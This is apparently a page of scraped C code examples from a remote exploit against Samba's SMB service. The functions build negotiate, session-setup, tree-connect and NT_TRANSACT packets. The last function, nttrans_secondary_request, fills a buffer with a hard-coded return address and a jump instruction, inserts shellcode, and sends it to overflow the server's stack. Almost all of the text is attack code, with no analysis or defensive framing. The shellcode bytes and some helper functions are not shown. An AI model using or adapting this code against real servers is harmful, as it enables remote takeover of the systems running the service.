Exemple #1
0
void sesssetupx_request(int fd)
{ uint8 data[] = "\x12\x0\x0\x0\x55\x6e\x69\x78\x00\x53\x61\x6d\x62\x61";
 char packet[sizeof (struct nbt_session_header) + sizeof (struct
smb_base_header) +
 sizeof (struct sesssetupx_request_header) + sizeof (data)];
 int size;

 construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) -
sizeof (struct nbt_session_header));
 construct_smb_base_header(packet + sizeof (struct nbt_session_header),
SMB_SESSSETUPX, 8, 1, 0, pid, 0, 1);
 construct_sesssetupx_header(packet + sizeof (struct nbt_session_header) +
sizeof (struct smb_base_header));
 memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct
smb_base_header) +
 sizeof (struct sesssetupx_request_header), &data, sizeof (data));

 if ((size = write(fd, packet, sizeof (packet))) == -1)
 { close(fd);
 fprintf(stderr, "write() failed, reason: '%s' (code %i)\n",
strerror(errno), errno);
 exit(-errno);
 }
 if (size != sizeof (packet))
 { close(fd);
 fprintf(stderr, "couldn't write entire packet, aborting!\n");
 exit(-1);
 }
}
Exemple #2
0
void negprot_request(int fd)
{ struct variable_data_header data;
 char dialects[] = "\x2PC NETWORK PROGRAM 1.0\x0\x2MICROSOFT NETWORKS
1.03\x0\x2MICROSOFT NETWORKS 3.0\x0\x2LANMAN1.0\x0" \
 "\x2LM1.2X002\x0\x2Samba\x0\x2NT LANMAN 1.0\x0\x2NT LM
0.12\x0\x2""FLATLINE'S KWAADWAAR";
 char packet[sizeof (struct nbt_session_header) + sizeof (struct
smb_base_header) + sizeof (data) + sizeof (dialects)];
 int dlen = htons(sizeof (dialects));

 memset(&data, '\0', sizeof (data));
 construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) -
sizeof (struct nbt_session_header));
 pid = getpid();
 construct_smb_base_header(packet + sizeof (struct nbt_session_header),
SMB_NEGPROT, 8, 1, 0, pid, 0, 1);

 memcpy(&data.bytecount, &dlen, sizeof (uint16));

 memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct
smb_base_header)), &data, sizeof (data));
 memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct
smb_base_header) + sizeof (data)),
 dialects, sizeof (dialects));

 if (write(fd, packet, sizeof (packet)) == -1)
 { close(fd);
 fprintf(stderr, "write() failed, reason: '%s' (code %i)\n",
strerror(errno), errno);
 exit(-errno);
 }
}
void nttrans_primary_request(int fd)
{   char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) +
                sizeof (struct nttrans_primary_request_header)];
    struct nttrans_primary_request_header nt_hdr;

    int size, function = SMB_NTTRANSCREATE, totalparamcount = TOTALCOUNT, totaldatacount = 0;
    uint8 setupcount = 0;

    memset(&nt_hdr, '\0', sizeof (nt_hdr));

    construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));
    construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NTTRANS1, 8, 1, tid, pid, uid, 1);

    nt_hdr.wordcount = 19 + setupcount;
    memcpy(&nt_hdr.function, &function, sizeof (uint16));

    memcpy(&nt_hdr.totalparamcount, &totalparamcount, sizeof (uint32));
    memcpy(&nt_hdr.totaldatacount, &totaldatacount, sizeof (uint32));

    memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header), &nt_hdr, sizeof (nt_hdr));

    if ((size = write(fd, packet, sizeof (packet))) == -1)
    {   close(fd);
        fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno);
        exit(-errno);
    }
    if (size != sizeof (packet))
    {   close(fd);
        fprintf(stderr, "couldn't write entire packet, aborting!\n");
        exit(-1);
    }
}
void tconx_request(int fd)
{   // geen fixed size buffer omdat we met dynamische data te maken hebben (variabele servernaam)
    char *packet;
    int size, pktsize = sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) +
                        sizeof (struct tconx_request_header) + strlen(tconx_servername) + 15;

    if ((packet = malloc(pktsize)) == NULL)
    {   close(fd);
        fprintf(stderr, "malloc() failed, aborting!\n");
        exit(-1);
    }

    construct_nbt_session_header(packet, SMB_SESSION, 0, pktsize - sizeof (struct nbt_session_header));
    construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_TCONX, 8, 1, 0, pid, uid, 1);
    construct_tconx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));

    if ((size = write(fd, packet, pktsize)) == -1)
    {   close(fd);
        fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno);
        exit(-errno);
    }

    free(packet);

    if (size != pktsize)
    {   close(fd);
        fprintf(stderr, "couldn't write entire packet, aborting!\n");
        exit(-1);
    }
}
/*
struct nttrans_secondary_request_header
{ uint8 pad[3], totalparamcount[4], totaldatacount[4], paramcount[4], paramoffset[4], paramdisplace[4],
    datacount[4], dataoffset[4], datadisplace[4];
}; */
void nttrans_secondary_request(int fd)
{   char retbuf[TOTALCOUNT], packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) +
                                    sizeof (struct nttrans_secondary_request_header) + TOTALCOUNT];
    struct nttrans_secondary_request_header nt_hdr;
    unsigned long retaddr, jmptocode = 0x9090a1eb; // jmptocode = 0x90909ceb;
    int i;

    int size, totalparamcount = TOTALCOUNT, totaldatacount = 0,
              paramcount = TOTALCOUNT, datacount = 0, paramdisplace = STACKBASE - PARAMBASE,
              datadisplace = 0, paramoffset = 68, dataoffset = 0;

    memset(&nt_hdr, '\0', sizeof (nt_hdr));
    retaddr = 0xbffff6eb;
    for (i = 0; i < TOTALCOUNT; i += 4)
    {   if (i == 0x100)
        {   memcpy(retbuf + i, &jmptocode, 4);
        }
        else memcpy(retbuf + i, &retaddr, 4);
    }

//  memset(shellcode, 0xCC, sizeof (shellcode));
    memcpy(retbuf + 0x100 - sizeof (shellcode), shellcode, sizeof (shellcode));

    printf("sizeof packet: %i, parambase: 0x%08lx\n", sizeof (packet), PARAMBASE);

    construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));
    construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NTTRANS2, 8, 1, tid, pid, uid, 1);

    memcpy(&nt_hdr.totalparamcount, &totalparamcount, sizeof (uint32));
    memcpy(&nt_hdr.totaldatacount, &totaldatacount, sizeof (uint32));
    memcpy(&nt_hdr.paramcount, &paramcount, sizeof (uint32));
    memcpy(&nt_hdr.datacount, &datacount, sizeof (uint32));
    memcpy(&nt_hdr.paramdisplace, &paramdisplace, sizeof (uint32));
    memcpy(&nt_hdr.datadisplace, &datadisplace, sizeof (uint32));
    memcpy(&nt_hdr.paramoffset, &paramoffset, sizeof (uint32));
    memcpy(&nt_hdr.dataoffset, &dataoffset, sizeof (uint32));

    memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header), &nt_hdr, sizeof (nt_hdr));
    memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (nt_hdr), retbuf, sizeof (retbuf));

    usleep(5000);

    if ((size = write(fd, packet, sizeof (packet))) == -1)
    {   close(fd);
        fprintf(stderr, "write() failed, reason: '%s' (code %i)\n", strerror(errno), errno);
        exit(-errno);
    }
    if (size != sizeof (packet))
    {   close(fd);
        fprintf(stderr, "couldn't write entire packet, aborting!\n");
        exit(-1);
    }
    fprintf(stderr, "secondary nttrans packet sent!\n");
}